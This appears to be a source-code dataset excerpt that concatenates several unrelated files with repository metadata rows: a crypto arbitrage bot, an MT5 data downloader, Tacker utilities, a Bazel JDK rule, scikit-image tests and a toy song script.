[res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']],
[res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']],
[res['left_eye_pupil']['x'], res['left_eye_pupil']['y']],
[res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']],
[res['left_eye_top']['x'], res['left_eye_top']['y']],
[res['left_eye_upper_left_quarter']['x'], res['left_eye_upper_left_quarter']['y']],
[res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']],
[res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']],
[res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']],
[res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']],
[res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']],
[res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']],
[res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']],
[res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']],
[res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']],
[res['mouth_left_corner']['x'], res['mouth_left_corner']['y']],
[res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']],
[res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']],
[res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']],
[res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']],
[res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']],
[res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']],
[res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']],
[res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']],
[res['mouth_right_corner']['x'], res['mouth_right_corner']['y']],
[res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']],
[res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']],
[res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']],
[res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']],
[res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']],
[res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']],
[res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']],
[res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']],
[res['nose_contour_left1']['x'], res['nose_contour_left1']['y']],
[res['nose_contour_left2']['x'], res['nose_contour_left2']['y']],
[res['nose_contour_left3']['x'], res['nose_contour_left3']['y']],
[res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']],
[res['nose_contour_right1']['x'], res['nose_contour_right1']['y']],
[res['nose_contour_right2']['x'], res['nose_contour_right2']['y']],
[res['nose_contour_right3']['x'], res['nose_contour_right3']['y']],
[res['nose_left']['x'], res['nose_left']['y']],
[res['nose_right']['x'], res['nose_right']['y']],
[res['nose_tip']['x'], res['nose_tip']['y']],
[res['right_eye_bottom']['x'], res['right_eye_bottom']['y']],
[res['right_eye_center']['x'], res['right_eye_center']['y']],
[res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']],
[res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']],
[res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']],
[res['right_eye_pupil']['x'], res['right_eye_pupil']['y']],
[res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']],
[res['right_eye_top']['x'], res['right_eye_top']['y']],
[res['right_eye_upper_left_quarter']['x'], res['right_eye_upper_left_quarter']['y']],
[res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']],
[res['right_eyebrow_left_corner']['x'], res['right_eyebrow_left_corner']['y']],
[res['right_eyebrow_upper_left_quarter']['x'], res['right_eyebrow_upper_left_quarter']['y']],
[res['right_eyebrow_upper_middle']['x'], res['right_eyebrow_upper_middle']['y']],
[res['right_eyebrow_upper_right_quarter']['x'], res['right_eyebrow_upper_right_quarter']['y']],
[res['right_eyebrow_right_corner']['x'], res['right_eyebrow_right_corner']['y']],
[res['right_eyebrow_lower_left_quarter']['x'], res['right_eyebrow_lower_left_quarter']['y']],
[res['right_eyebrow_lower_middle']['x'], res['right_eyebrow_lower_middle']['y']],
[res['right_eyebrow_lower_right_quarter']['x'], res['right_eyebrow_lower_right_quarter']['y']],
]
return pointer
| 47.308511 | 103 | 0.619744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,608 | 0.518102 |
bcf7f47be4d0d789e4869009ef9f2f68c5ab3b33 | 5,383 | py | Python | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | main_cl.py | spiolynn/pybo | 186495de315eb8ec47a996de959574f9864da7c4 | [
"MIT"
] | null | null | null | # coding: utf-8
from bigone import BigOneDog
from common import gen_logger
import logging
import time
import json
def strategy_eth_big_bnc_eth(dog):
"""
正向:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC
反向:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH
:param dog: implemention of BigOneDog
:return: 正向收益率,反向收益率
"""
big_eth_data = dog.get_order_book('BIG-ETH')
big_bnc_data = dog.get_order_book('BIG-BNC')
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('BIG-ETH')
print('卖一', big_eth_data['asks'][0]['price'], big_eth_data['asks'][0]['amount'])
print('买一', big_eth_data['bids'][0]['price'], big_eth_data['bids'][0]['amount'])
print('BIG-BNC')
print('卖一', big_bnc_data['asks'][0]['price'], big_bnc_data['asks'][0]['amount'])
print('买一', big_bnc_data['bids'][0]['price'], big_bnc_data['bids'][0]['amount'])
print('ETH-BNC')
print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
# positive transaction
pos_anc = 0.999*0.999*0.999*\
((1 / (float(big_eth_data['asks'][0]['price'])))
* float(big_bnc_data['bids'][0]['price']) )
pos_anc = pos_anc / float(eth_bnc_data['asks'][0]['price']) - 1
# negative transaction
neg_anc = 0.999 * 0.999 * 0.999 * \
(float(eth_bnc_data['bids'][0]['price'])
/ float(big_bnc_data['asks'][0]['price'])
* float(big_eth_data['asks'][0]['price']))
neg_anc = neg_anc / 1 - 1
flag = False
amt = 2.0
if float(big_eth_data['asks'][0]['amount']) >= amt:
if float(big_bnc_data['bids'][0]['amount']) >= amt:
if float(eth_bnc_data['asks'][0]['amount']) >= amt * float(big_eth_data['asks'][0]['price']):
flag = True
msg = "预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润:"
if pos_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "利润空间大于1%"
if flag is False:
result = "{},{}".format(result,"量不足, 放弃本次套利 0")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
else:
result = "{},{}".format(result,"执行本次套利 1")
logger.info("{0} {1:.2f}%, {2}".format(msg,pos_anc*100,result))
print("{} {} {} {}".format('BIG-ETH','BID', big_eth_data['asks'][0]['price'], str(amt)))
print("{} {} {} {}".format('BIG-BNC','ASK', big_bnc_data['bids'][0]['price'], str(amt)))
print("{} {} {} {}".format('ETH-BNC','BID', eth_bnc_data['asks'][0]['price'],
str(amt * float(big_eth_data['asks'][0]['price']))))
# dog.create_order('BIG-ETH','ASK', big_eth_data['asks'][0]['price'], '2.0')
# dog.create_order('BIG-BNC','BID', big_bnc_data['bids'][0]['price'], '2.0')
# dog.create_order('ETH-BNC','ASK', eth_bnc_data['asks'][0]['price'],
# str(2.0 * float(big_eth_data['asks'][0]['price'])))
return True
if neg_anc < 0.01:
result = "利润空间小于1%, 放弃本次套利 0"
else:
result = "利润空间大于1%, 执行本次套利 1"
logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
return False
# return pos_anc, neg_anc
def strategy_eth_bnc(dog):
eth_bnc_data = dog.get_order_book('ETH-BNC')
print('ETH-BNC')
print('卖一', eth_bnc_data['asks'][0]['price'], eth_bnc_data['asks'][0]['amount'])
print('买一', eth_bnc_data['bids'][0]['price'], eth_bnc_data['bids'][0]['amount'])
anc = float(eth_bnc_data['asks'][0]['price']) / float(eth_bnc_data['bids'][0]['price']) - 1
print(anc)
if anc > 0.02:
r = dog.create_order('ETH-BNC', 'BID', str(float(eth_bnc_data['bids'][0]['price'])+0.01), '0.01' )
bid_order_id = r['order_id']
r = dog.create_order('ETH-BNC', 'ASK', str(float(eth_bnc_data['asks'][0]['price'])-0.01), '0.01' )
ask_order_id = r['order_id']
return anc, anc
if __name__ == '__main__':
gen_logger('bigonetest')
logger = logging.getLogger("bigone")
with open("PRIVATE_KEY.json",'r') as f:
private_key = json.load(f)["key"]
dog = BigOneDog(private_key)
# strategy_eth_bnc(dog)
# dog.get_orders("ETH-BNC",'10')
# r = dog.get_order("b79ef031-c477-46f9-b452-7e97aa97435d")
# print(r)
# r = dog.get_orders('ETH-BNC','10')
# print(r)
while True:
flag = strategy_eth_big_bnc_eth(dog)
if flag is True:
break
else:
print("休眠10秒")
print("")
time.sleep(10)
# break
# pos_anc, neg_anc = strategy_eth_bnc(dog)
# if pos_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[正向套利:买BIG/ETH -> 卖BIG/BNC -> 买ETH/BNC]利润: {0:.2f}%, {1}".format(pos_anc*100,result))
#
# if neg_anc < 0.01:
# result = "利润空间小于1%, 放弃本次套利 0"
# else:
# result = "利润空间大于1%, 执行本次套利 1"
#
# logger.info("预期本次[反向套利:卖ETH/BNC -> 买BIG/BNC -> 卖BIG/ETH]利润: {0:.2f}%, {1}".format(neg_anc*100,result))
#
# print("休眠10秒")
# print("")
# time.sleep(10)
| 35.886667 | 112 | 0.546907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,653 | 0.458441 |
bcf9bd066aefdc4f6abca126693e2677662eb927 | 1,542 | py | Python | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | 1 | 2018-07-02T13:54:49.000Z | 2018-07-02T13:54:49.000Z | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | null | null | null | histdata/mt5db/script_DownloadAndStoreToMongodb.py | UpSea/midProjects | ed6086e74f68b1b89f725abe0b270e67cf8993a8 | [
"MIT"
] | 3 | 2016-05-28T15:13:02.000Z | 2021-04-10T06:04:25.000Z | # -*- coding: utf-8 -*-
import os,sys
from PyQt4 import QtGui,QtCore
dataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'histdata'))
sys.path.append(dataRoot)
import dataCenter as dataCenter
from data.mongodb.DataSourceMongodb import Mongodb
import datetime as dt
def getSymbols():
#mid 1)从excel赋值粘贴获得如下数据
codesStr = """
XAGUSD
"""
#mid 2)将字符串使用split()分割为list,默认会去除\n和所有空格。
#codeList = ['000021.SZ','000022.SZ']
codeList = [code.split('.')[0] for code in codesStr.split()]
return codeList
def subMain():
DC = dataCenter.dataCenter()
remoteDataSourceType = 'mt5'
localStorageType = 'mongodb'
periodType = 'D'
timeStart = dt.datetime(2000,10,20)
timeEnd = dt.datetime.now()
# 1)get codes form eastmoney
codeList = getSymbols()
# 2)download history data
dataDict = DC.downloadHistData(providerType=remoteDataSourceType,storageType=localStorageType,periodType=periodType,
codeList=codeList,timeFrom = timeStart,timeTo = timeEnd)
if __name__ == '__main__':
#app = QtGui.QApplication(sys.argv)
#mid-----------------------------------------------------------------------------------------------------------------------------
subMain()
#mid-----------------------------------------------------------------------------------------------------------------------------
#sys.exit(app.exec_()) | 37.609756 | 133 | 0.527237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 648 | 0.403487 |
bcfb7330e40f9b79f2ab184f143d401951828548 | 2,513 | py | Python | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 116 | 2015-10-18T02:57:08.000Z | 2022-03-15T04:09:18.000Z | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 6 | 2016-11-07T22:15:54.000Z | 2021-05-09T06:13:08.000Z | tacker/sol_refactored/common/vnf_instance_utils.py | h1r0mu/tacker | 8c69dda51fcfe215c4878a86b82018d2b96e5561 | [
"Apache-2.0"
] | 166 | 2015-10-20T15:31:52.000Z | 2021-11-12T08:39:49.000Z | # Copyright (C) 2021 Nippon Telegraph and Telephone Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from tacker.sol_refactored.common import exceptions as sol_ex
from tacker.sol_refactored import objects
LOG = logging.getLogger(__name__) # not used at the moment
def get_inst(context, inst_id):
inst = objects.VnfInstanceV2.get_by_id(context, inst_id)
if inst is None:
raise sol_ex.VnfInstanceNotFound(inst_id=inst_id)
return inst
def get_inst_all(context):
return objects.VnfInstanceV2.get_all(context)
def inst_href(inst_id, endpoint):
return "{}/v2/vnflcm/vnf_instances/{}".format(endpoint, inst_id)
def make_inst_links(inst, endpoint):
links = objects.VnfInstanceV2_Links()
self_href = inst_href(inst.id, endpoint)
links.self = objects.Link(href=self_href)
if inst.instantiationState == 'NOT_INSTANTIATED':
links.instantiate = objects.Link(href=self_href + "/instantiate")
else: # 'INSTANTIATED'
links.terminate = objects.Link(href=self_href + "/terminate")
# TODO(oda-g): add when the operation supported
# links.scale = objects.Link(href = self_href + "/scale")
# etc.
return links
# see IETF RFC 7396
def json_merge_patch(target, patch):
if isinstance(patch, dict):
if not isinstance(target, dict):
target = {}
for key, value in patch.items():
if value is None:
if key in target:
del target[key]
else:
target[key] = json_merge_patch(target.get(key), value)
return target
else:
return patch
def select_vim_info(vim_connection_info):
# NOTE: It is assumed that vimConnectionInfo has only one item
# at the moment. If there are multiple items, it is uncertain
# which item is selected.
for vim_info in vim_connection_info.values():
return vim_info
| 32.217949 | 78 | 0.68842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,039 | 0.41345 |
4c040273405e24f9a3249bb42b05984c6988f41a | 3,445 | py | Python | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | Wheels.py | edhosken/WheelsSong | cb988c8510a1095eeec3a2399b0fc0ba24bfa648 | [
"MIT"
] | null | null | null | #Create the pre-defined song values and empty variables...Correct names not used so each starting letter would be unique
numbers = (1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 )
letters = ['a ','b ','c ','d ','e ','f ','g ','h ','i ','j ','k ','l ','m ','n ','o ','p ','q ','r ']
roman = ['I ', 'II ', 'III ', 'IV ', 'V ', 'VI ', 'VII ', 'VIII ', 'IX ', 'X ', 'XI ', 'XII ', 'XIII ', 'XIV ', 'XV ', 'XVI ', 'XVII ', 'XVIII']
military = ['alpha ', 'bravo ', 'charlie ', 'delta ', 'echo ', 'foxtrot ', 'golf ', 'hotel ', 'india ', 'juliet ', 'kilo ', 'lima ', 'mike ', 'november ', 'oscar ', 'papa ', 'quebec ', 'romeo ']
german = ['eins', 'zwei', 'drei', 'vier', 'fünf', 'sechs', 'sieben', 'acht', 'neun', 'zehn', 'elf', 'zwölf', 'dreizehn', 'vierzehn', 'fünfzehn', 'sechzehn', 'siebzehn', 'achtzehn']
pi = ['3 ','point ','1 ','4 ','1 ','5 ','9 ','2 ','6 ','5 ','3 ','5 ','8 ','9 ','7 ','9 ','3 ','2 ']
##Build morse code sequences
t = 'dot'
s = 'dash'
m1 = t, s, s, s, s
m2 = t, t, s, s, s
m3 = t, t, t, s, s
m4 = t, t, t, t, s
m5 = t, t, t, t, t
m6 = s, t, t, t, t
m7 = s, s, t, t, t
m8 = s, s, s, t, t
m9 = s, s, s, s, t
m0 = s, s, s, s, s
code = [m1, m2, m3, m4, m5, m6, m7, m8, m9, m1 + m0, m1 + m1, m1 + m2, m1 + m3, m1 + m4, m1 + m5, m1 + m6, m1 + m7, m1 + m8]
##Other ideas: piglatin, japanese, spanish, prime, tau, e, ...
##NEED TO ADD INVALID ENTRY CATCHES
print("Hello, let's sing a song that everybody loves!\n")
sing = 'y'
while sing == 'y':
user = []
variation = input ("Please input what variation you wish to perform be entering 'numbers', 'letters', 'roman', 'military', 'pi', 'german', 'code', or 'user' to make your own song: \n").lower().strip()
##Seeming silly switching of strings to list types
if variation == "numbers" or variation == "n":
variation = numbers
elif variation == "letters" or variation == "l":
variation = letters
elif variation == "roman" or variation == "r":
variation = roman
elif variation == "military" or variation == "m":
variation = military
elif variation == "pi" or variation == "p":
variation = pi
elif variation == "german" or variation == "g":
variation = german
elif variation == "code" or variation == "c":
variation = code
elif variation == "user" or variation == "u":
while len(user) < 18:
user.append(input ("Enter a word: "))
#User input to select the song pattern
pattern = input ("\nNow please tell me what pattern to use by entering 'forward', 'backward', 'even', or 'odd':\n")
print ("\nHere we go: \n\n")
#Asemble the song...IMPROVE FORMAT SO OUTPUT IS EASIER TO READ
song1 = "Oh, there are "
song2 = " wheels on a big rig truck!"
a = song1, variation[::], song2
b = song1, variation[::-1], song2
c = song1, variation[::2], song2
d = song1, variation[1::2], song2
##Use pattern.startswith()?...Also, might be better to seperate forward/backward and even/odd choices.
if pattern == 'forward' or pattern == 'f':
print (a)
elif pattern == 'backward' or pattern == 'b':
print (b)
elif pattern == 'odd' or pattern == 'o':
print (c)
elif pattern == 'even' or pattern == 'e':
print (d)
sing = input('\n\nWould you like to sing it again? (y/n) ').lower()
## This is the end of the while loop
else:
print ("\nOK, Goodbye!")
| 37.445652 | 204 | 0.54688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,663 | 0.482309 |
4c0a433f8f2a1c5fe05d98092959a53a97b1beea | 8,767 | bzl | Python | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 16,989 | 2015-09-01T19:57:15.000Z | 2022-03-31T23:54:00.000Z | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 12,562 | 2015-09-01T09:06:01.000Z | 2022-03-31T22:26:20.000Z | tools/jdk/local_java_repository.bzl | loongarch64/bazel | 44c30aceec076a0c25f506508704df0b9aeb6578 | [
"Apache-2.0"
] | 3,707 | 2015-09-02T19:20:01.000Z | 2022-03-31T17:06:14.000Z | # Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for importing and registering a local JDK."""
load(":default_java_toolchain.bzl", "JVM8_TOOLCHAIN_CONFIGURATION", "default_java_toolchain")
def _detect_java_version(repository_ctx, java_bin):
properties_out = repository_ctx.execute([java_bin, "-XshowSettings:properties"]).stderr
# This returns an indented list of properties separated with newlines:
# " java.vendor.url.bug = ... \n"
# " java.version = 11.0.8\n"
# " java.version.date = 2020-11-05\"
strip_properties = [property.strip() for property in properties_out.splitlines()]
version_property = [property for property in strip_properties if property.startswith("java.version = ")]
if len(version_property) != 1:
return None
version_value = version_property[0][len("java.version = "):]
parts = version_value.split(".")
major = parts[0]
if len(parts) == 1:
return major
elif major == "1": # handles versions below 1.8
minor = parts[1]
return minor
return major
def local_java_runtime(name, java_home, version, runtime_name = None, visibility = ["//visibility:public"]):
"""Defines a java_runtime target together with Java runtime and compile toolchain definitions.
Java runtime toolchain is constrained by flag --java_runtime_version having
value set to either name or version argument.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation. This requires a different configuration for JDK8
than the newer versions.
Args:
name: name of the target.
java_home: Path to the JDK.
version: Version of the JDK.
runtime_name: name of java_runtime target if it already exists.
visibility: Visibility that will be applied to the java runtime target
"""
if runtime_name == None:
runtime_name = name
native.java_runtime(
name = runtime_name,
java_home = java_home,
visibility = visibility,
)
native.config_setting(
name = name + "_name_setting",
values = {"java_runtime_version": name},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_version_setting",
values = {"java_runtime_version": version},
visibility = ["//visibility:private"],
)
native.config_setting(
name = name + "_name_version_setting",
values = {"java_runtime_version": name + "_" + version},
visibility = ["//visibility:private"],
)
native.alias(
name = name + "_settings_alias",
actual = select({
name + "_name_setting": name + "_name_setting",
name + "_version_setting": name + "_version_setting",
"//conditions:default": name + "_name_version_setting",
}),
visibility = ["//visibility:private"],
)
native.toolchain(
name = "runtime_toolchain_definition",
target_settings = [":%s_settings_alias" % name],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = runtime_name,
)
if version == "8":
default_java_toolchain(
name = name + "_toolchain_java8",
configuration = JVM8_TOOLCHAIN_CONFIGURATION,
source_version = version,
target_version = version,
java_runtime = runtime_name,
)
elif type(version) == type("") and version.isdigit() and int(version) > 8:
for version in range(8, int(version) + 1):
default_java_toolchain(
name = name + "_toolchain_java" + str(version),
source_version = str(version),
target_version = str(version),
java_runtime = runtime_name,
)
# else version is not recognized and no compilation toolchains are predefined
def _local_java_repository_impl(repository_ctx):
"""Repository rule local_java_repository implementation.
Args:
repository_ctx: repository context
"""
java_home = repository_ctx.attr.java_home
java_home_path = repository_ctx.path(java_home)
if not java_home_path.exists:
fail('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' +
"does not exist." % (java_home, str(java_home_path)))
repository_ctx.file(
"WORKSPACE",
"# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" +
"workspace(name = \"{name}\")\n".format(name = repository_ctx.name),
)
extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else ""
java_bin = java_home_path.get_child("bin").get_child("java" + extension)
if not java_bin.exists:
# Java binary does not exist
repository_ctx.file(
"BUILD.bazel",
_NOJDK_BUILD_TPL.format(
local_jdk = repository_ctx.name,
java_binary = "bin/java" + extension,
java_home = java_home,
),
False,
)
return
# Detect version
version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin)
# Prepare BUILD file using "local_java_runtime" macro
build_file = ""
if repository_ctx.attr.build_file != None:
build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file))
runtime_name = '"jdk"' if repository_ctx.attr.build_file else None
local_java_runtime_macro = """
local_java_runtime(
name = "%s",
runtime_name = %s,
java_home = "%s",
version = "%s",
)
""" % (repository_ctx.name, runtime_name, java_home, version)
repository_ctx.file(
"BUILD.bazel",
'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' +
build_file +
local_java_runtime_macro,
)
# Symlink all files
for file in repository_ctx.path(java_home).readdir():
repository_ctx.symlink(file, file.basename)
# Build file template, when JDK does not exist
_NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule")
fail_rule(
name = "jdk",
header = "Auto-Configuration Error:",
message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " +
"PATH or specify Java from remote repository (e.g. " +
"--java_runtime_version=remotejdk_11")
)
config_setting(
name = "localjdk_setting",
values = {{"java_runtime_version": "{local_jdk}"}},
visibility = ["//visibility:private"],
)
toolchain(
name = "runtime_toolchain_definition",
target_settings = [":localjdk_setting"],
toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type",
toolchain = ":jdk",
)
'''
_local_java_repository_rule = repository_rule(
implementation = _local_java_repository_impl,
local = True,
configure = True,
attrs = {
"java_home": attr.string(),
"version": attr.string(),
"build_file": attr.label(),
},
)
def local_java_repository(name, java_home, version = "", build_file = None):
"""Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain.
Toolchain resolution is constrained with --java_runtime_version flag
having value of the "name" or "version" parameter.
Java compile toolchains are created for --java_language_version flags values
between 8 and version (inclusive). Java compile toolchains use the same
(local) JDK for compilation.
If there is no JDK "virtual" targets are created, which fail only when actually needed.
Args:
name: A unique name for this rule.
java_home: Location of the JDK imported.
build_file: optionally BUILD file template
version: optionally java version
"""
_local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file)
native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
| 37.626609 | 130 | 0.666705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,553 | 0.519334 |
4c131d63691e04e79320d304f39d4fe881bda148 | 1,850 | py | Python | site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 59f185149b71e57e5debeb1c9a61a28739e81720 | [
"MIT"
] | null | null | null | site-packages/skimage/io/tests/test_io.py | oz90210/Pyto | 59f185149b71e57e5debeb1c9a61a28739e81720 | [
"MIT"
] | 1 | 2020-04-25T20:36:07.000Z | 2020-04-25T20:36:07.000Z | site-packages/skimage/io/tests/test_io.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | null | null | null | import os
import numpy as np
from skimage import io, data_dir
from skimage._shared import testing
from skimage._shared.testing import assert_array_equal
one_by_one_jpeg = (
b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01'
b'\x00\x01\x00\x00\xff\xdb\x00C\x00\x03\x02\x02\x02\x02'
b'\x02\x03\x02\x02\x02\x03\x03\x03\x03\x04\x06\x04\x04'
b'\x04\x04\x04\x08\x06\x06\x05\x06\t\x08\n\n\t\x08\t\t'
b'\n\x0c\x0f\x0c\n\x0b\x0e\x0b\t\t\r\x11\r\x0e\x0f\x10'
b'\x10\x11\x10\n\x0c\x12\x13\x12\x10\x13\x0f\x10\x10'
b'\x10\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11'
b'\x00\xff\xc4\x00\x14\x00\x01\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xff\xc4\x00'
b'\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x00\x00\x00\x00\x00\x00\xff\xda\x00\x08\x01\x01\x00'
b'\x00?\x00*\x9f\xff\xd9'
)
def test_stack_basic():
x = np.arange(12).reshape(3, 4)
io.push(x)
assert_array_equal(io.pop(), x)
def test_stack_non_array():
with testing.raises(ValueError):
io.push([[1, 2, 3]])
def test_imread_file_url():
# tweak data path so that file URI works on both unix and windows.
data_path = data_dir.lstrip(os.path.sep)
data_path = data_path.replace(os.path.sep, '/')
image_url = 'file:///{0}/camera.png'.format(data_path)
image = io.imread(image_url)
assert image.shape == (512, 512)
def test_imread_http_url(httpserver):
# httpserver is a fixture provided by pytest-localserver
# https://bitbucket.org/pytest-dev/pytest-localserver/
httpserver.serve_content(one_by_one_jpeg)
# it will serve anything you provide to it on its url.
# we add a /test.jpg so that we can identify the content
# by extension
image = io.imread(httpserver.url + '/test.jpg' + '?' + 's' * 266)
assert image.shape == (1, 1)
| 33.636364 | 70 | 0.677838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 971 | 0.524865 |
4c193e499f0f1632e4dcf16c607003de7e5c3eaa | 14,091 | py | Python | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | docker/docker-puppet.py | mail2nsrajesh/tripleo-heat-templates | 368b3eadda577f9914d181893df2df96367e8fad | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
